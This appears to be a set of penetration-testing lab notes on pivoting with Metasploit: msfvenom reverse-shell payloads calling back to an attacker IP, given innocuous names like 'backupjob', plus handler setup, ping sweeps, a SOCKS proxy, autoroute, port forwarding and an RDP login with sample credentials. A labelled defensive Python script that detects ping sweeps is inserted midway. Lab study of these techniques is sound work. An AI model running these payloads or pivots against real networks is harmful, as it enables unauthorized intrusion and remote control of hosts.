Creating Payload for Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Configuring & Starting the multi/handler

use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run

We can copy the backupjob binary file to the Ubuntu pivot host over SSH and execute it to gain a Meterpreter session.

Executing the Payload on the Pivot Host

./backupjob

Ping Sweep

run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ping Sweep For Loop on Linux Pivot Hosts

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Ping Sweep For Loop Using CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Ping Sweep Using PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

Note: It is possible that a ping sweep may not result in successful replies on the first attempt, especially when communicating across networks. This can be caused by the time it takes for a host to build its ARP cache. In these cases, it is good to attempt our ping sweep at least twice to ensure the ARP cache gets built.
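As an added, defender-side example (not part of the original notes), the following Python script flags the traffic pattern the sweeps above produce: one source sending ICMP echo requests to many distinct hosts within a short window. The log line format and the sample traffic are constructed assumptions, not real captures.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed): "<ISO timestamp> ICMP echo-request <src> -> <dst>"
LINE_RE = re.compile(r"^(\S+) ICMP echo-request (\S+) -> (\S+)$")


def build_sample_log():
    """Constructed sample traffic: one host sweeps 172.16.5.1-40 twice a few
    seconds apart (mirroring the 'run the sweep twice' advice), while another
    host only pings its gateway once a minute."""
    lines = []
    base = datetime(2024, 5, 1, 10, 0, 0)
    for attempt in range(2):
        for i in range(1, 41):
            t = base + timedelta(seconds=attempt * 5 + i * 0.05)
            lines.append(f"{t.isoformat()} ICMP echo-request 172.16.5.129 -> 172.16.5.{i}")
    for k in range(5):
        t = base + timedelta(minutes=k)
        lines.append(f"{t.isoformat()} ICMP echo-request 172.16.5.35 -> 172.16.5.1")
    return lines


def detect_ping_sweeps(lines, window=timedelta(seconds=60), min_targets=20):
    """Return {src: distinct_destinations} for every source that probed at least
    min_targets distinct hosts inside some window-long interval.  Repeated pings
    to the same host (retries) count once, so a second pass neither inflates
    the score nor hides the sweep; a host pinging one gateway never triggers."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not echo requests in the assumed format
        events[m.group(2)].append((datetime.fromisoformat(m.group(1)), m.group(3)))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = len({dst for _, dst in evs[lo:hi + 1]})
            if distinct >= min_targets:
                hits[src] = max(hits.get(src, 0), distinct)
    return hits


if __name__ == "__main__":
    print(detect_ping_sweeps(build_sample_log()))
```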

Instead of using SSH for port forwarding, we can also use Metasploit's post-exploitation routing module socks_proxy to configure a local proxy on our attack host. We will configure the SOCKS proxy for SOCKS version 4a.

Configuring MSF’s SOCKS Proxy

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run
options

Confirming Proxy Server is Running

jobs
Id  Name                           Payload  Payload opts
--  ----                           -------  ------------
0   Auxiliary: server/socks_proxy

Adding a Line to proxychains.conf if Needed

socks4 	127.0.0.1 9050

Next, we tell our socks_proxy module to route all traffic through our Meterpreter session. We can use the post/multi/manage/autoroute module from Metasploit to add routes for the 172.16.5.0 subnet and then send all our proxychains traffic through them.

Creating Routes with AutoRoute

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

or

run autoroute -s 172.16.5.0/23

We can use the -p option to list the active routes.

Listing Active Routes with AutoRoute

run autoroute -p

Testing Proxy & Routing Functionality

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Port Forwarding

Portfwd options

help portfwd

Creating Local TCP Relay

portfwd add -l 3300 -p 3389 -r 172.16.5.19

Connecting to Windows Target through localhost

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Netstat Output

netstat -antp

Meterpreter Reverse Port Forwarding

Reverse Port Forwarding Rules

portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Configuring & Starting multi/handler

bg
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081
set LHOST 0.0.0.0
run

Generating the Windows Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Establishing the Meterpreter session

shell